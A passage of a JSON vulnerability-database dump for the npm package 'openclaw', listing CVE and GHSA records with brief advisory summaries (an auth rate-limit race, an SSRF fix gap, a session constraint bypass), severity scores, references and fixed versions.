                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/31160dc069b7cc5d833b39c53736a41ad3befda2"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q3jj-46pq-826r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q3jj-46pq-826r"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44997",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44997"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-security-envelope-constraint-bypass-in-acp-child-sessions",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-security-envelope-constraint-bypass-in-acp-child-sessions"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-q3jj-46pq-826r",
                    "reference_id": "GHSA-q3jj-46pq-826r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-q3jj-46pq-826r"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"
                }
            ],
            "aliases": [
                "CVE-2026-44997",
                "GHSA-q3jj-46pq-826r"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xj73-kszs-yygp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89086?format=api",
            "vulnerability_id": "VCID-xnvm-rp36-vyaj",
            "summary": "OpenClaw: Concurrent async auth attempts can bypass the intended shared-secret rate-limit budget on Tailscale-capable paths\n## Impact\n\nConcurrent async auth attempts can bypass the intended shared-secret rate-limit budget on Tailscale-capable paths.\n\nConcurrent asynchronous shared-secret auth attempts could race the per-key rate-limit budget.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.2`\n- Patched versions: `2026.4.4`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @Telecaster2147 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41913",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23421",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23468",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23481",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41913"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-25wv-8phj-8p7r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-25wv-8phj-8p7r"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41913",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41913"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-rate-limit-bypass-via-concurrent-async-authentication-attempts",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-rate-limit-bypass-via-concurrent-async-authentication-attempts"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-25wv-8phj-8p7r",
                    "reference_id": "GHSA-25wv-8phj-8p7r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-25wv-8phj-8p7r"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110113?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.4",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.4"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110881?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.5",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-x1qe-u363-qqaa"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.5"
                }
            ],
            "aliases": [
                "CVE-2026-41913",
                "GHSA-25wv-8phj-8p7r"
            ],
            "risk_score": 2.9,
            "exploitability": "0.5",
            "weighted_severity": "5.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xnvm-rp36-vyaj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91330?format=api",
            "vulnerability_id": "VCID-xpr3-hg3h-z3bz",
            "summary": "OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n## Summary\n\nSeveral channel extensions sent outbound requests to their configured base URLs without the SSRF guard added for CVE-2026-28476, so that earlier fix was incomplete.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSeveral channel extensions still used raw `fetch()` against configured base URLs without the SSRF guard that was added for CVE-2026-28476. Commit `f92c92515bd439a71bd03eb1bc969c1964f17acf` routes those outbound requests through `fetchWithSsrFGuard` so configured endpoints cannot be rebound to blocked internal destinations.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f92c92515bd439a71bd03eb1bc969c1964f17acf`.\n\n## Fix Commit(s)\n\n- `f92c92515bd439a71bd03eb1bc969c1964f17acf`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35629",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14495",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14536",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14532",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35629"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35629",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35629"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-pg2v-8xwh-qhcc",
                    "reference_id": "GHSA-pg2v-8xwh-qhcc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-pg2v-8xwh-qhcc"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rhfg-j8jq-7v2h",
                    "reference_id": "GHSA-rhfg-j8jq-7v2h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rhfg-j8jq-7v2h"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
